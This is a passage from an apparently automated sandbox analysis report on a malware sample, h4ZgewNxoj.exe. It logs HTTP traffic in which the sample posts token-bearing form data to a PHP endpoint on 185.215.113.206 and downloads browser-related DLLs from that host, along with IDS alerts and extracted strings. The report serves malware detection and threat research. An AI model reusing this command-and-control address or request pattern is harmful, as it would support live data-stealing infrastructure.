2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 47 49 4a 4a 4b 46 43 47 44 47 48 44 48 49 45 43 47 43 42 4b 2d 2d 0d 0a Data Ascii: ------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="token"7811ce1511ee85bbf833f1530f3a4a672bb4c7568d0e243a7dd15c52de126103ecf52f0e------GIJJKFCGDGHDHIECGCBKContent-Disposition: form-data; name="message"ybncbhylepme------GIJJKFCGDGHDHIECGCBK--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDGHDGIDAKEBAAKFCGHCHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 47 48 44 47 49 44 41 4b 45 42 41 41 4b 46 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 38 31 31 63 65 31 35 31 31 65 65 38 35 62 62 66 38 33 33 66 31 35 33 30 66 33 61 34 61 36 37 32 62 62 34 63 37 35 36 38 64 30 65 32 34 33 61 37 64 64 31 35 63 35 32 64 65 31 32 36 31 30 33 65 63 66 35 32 66 30 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 48 44 47 49 44 41 4b 45 42 41 41 4b 46 43 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 47 48 44 47 49 44 41 4b 45 42 41 41 4b 46 43 47 48 43 2d 2d 0d 0a Data Ascii: ------IDGHDGIDAKEBAAKFCGHCContent-Disposition: form-data; name="token"7811ce1511ee85bbf833f1530f3a4a672bb4c7568d0e243a7dd15c52de126103ecf52f0e------IDGHDGIDAKEBAAKFCGHCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IDGHDGIDAKEBAAKFCGHC--
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox View IP Address: 185.215.113.206 185.215.113.206
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: Joe Sandbox View JA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49704 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49822 -> 185.215.113.206:80
Source: unknown HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49932 version: TLS 1.0
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.206
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: apis.google.com
Source: global traffic DNS traffic detected: DNS query: play.google.com
Source: unknown HTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 905sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded;charset=UTF-8Accept: */*Origin: chrome-untrusted://new-tab-pageX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.1
Source: h4ZgewNxoj.exe, 00000000.00000002.2466300957.0000000000774000.00000040.00000001.01000000.00000003.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2466300957.0000000000857000.00000040.00000001.01000000.00000003.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/freebl3.dll
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dll
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/mozglue.dlle
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/msvcp140.dll$
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dllS
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/nss3.dlla
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dll
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/softokn3.dllY
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dll
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/sqlite3.dllO
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dll
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllb
Source: h4ZgewNxoj.exe, 00000000.00000002.2470791206.000000000B861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php&
Source: h4ZgewNxoj.exe, 00000000.00000002.2470791206.000000000B861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php2
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php6
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php:
Source: h4ZgewNxoj.exe, 00000000.00000002.2466300957.0000000000774000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpSxS
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpV
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpZ
Source: h4ZgewNxoj.exe, 00000000.00000002.2466300957.0000000000774000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpation
Source: h4ZgewNxoj.exe, 00000000.00000002.2466300957.0000000000857000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpfox
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phph
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.phpr
Source: h4ZgewNxoj.exe, 00000000.00000002.2470791206.000000000B861000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/c4becf79229cb002.php~
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000FD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/tem
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206D
Source: h4ZgewNxoj.exe, 00000000.00000002.2466300957.0000000000857000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.215.113.206c4becf79229cb002.php243a7dd15c52de126103ecf52f0e-release
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: chromecache_112.4.dr String found in binary or memory: http://www.broofa.com
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: h4ZgewNxoj.exe, h4ZgewNxoj.exe, 00000000.00000002.2473897170.000000006C54D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: h4ZgewNxoj.exe, 00000000.00000002.2468372770.0000000005715000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2473770665.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp, EBAAAFBG.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_115.4.dr String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: chromecache_115.4.dr String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
Source: chromecache_115.4.dr, chromecache_112.4.dr String found in binary or memory: https://apis.google.com
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2470791206.000000000B861000.00000004.00000020.00020000.00000000.sdmp, BGCBGCAFIIECBFIDHIJK.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2470791206.000000000B861000.00000004.00000020.00020000.00000000.sdmp, BGCBGCAFIIECBFIDHIJK.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: EBAAAFBG.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp, EBAAAFBG.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp, EBAAAFBG.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chromecache_115.4.dr String found in binary or memory: https://clients6.google.com
Source: chromecache_115.4.dr String found in binary or memory: https://content.googleapis.com
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2470791206.000000000B861000.00000004.00000020.00020000.00000000.sdmp, BGCBGCAFIIECBFIDHIJK.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2470791206.000000000B861000.00000004.00000020.00020000.00000000.sdmp, BGCBGCAFIIECBFIDHIJK.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: chromecache_115.4.dr String found in binary or memory: https://domains.google.com/suggest/flow
Source: EBAAAFBG.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: EBAAAFBG.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: EBAAAFBG.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_112.4.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_112.4.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_112.4.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_112.4.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: BGCBGCAFIIECBFIDHIJK.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: chromecache_112.4.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: chromecache_115.4.dr String found in binary or memory: https://plus.google.com
Source: chromecache_115.4.dr String found in binary or memory: https://plus.googleapis.com
Source: FHIDAFHCBAKFCAAKFCFCFIIJKF.0.dr String found in binary or memory: https://support.mozilla.org
Source: FHIDAFHCBAKFCAAKFCFCFIIJKF.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: FHIDAFHCBAKFCAAKFCFCFIIJKF.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: chromecache_115.4.dr String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
Source: h4ZgewNxoj.exe, 00000000.00000002.2467001379.000000000102D000.00000004.00000020.00020000.00000000.sdmp, h4ZgewNxoj.exe, 00000000.00000002.2470791206.000000000B861000.00000004.00000020.00020000.00000000.sdmp, BGCBGCAFIIECBFIDHIJK.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
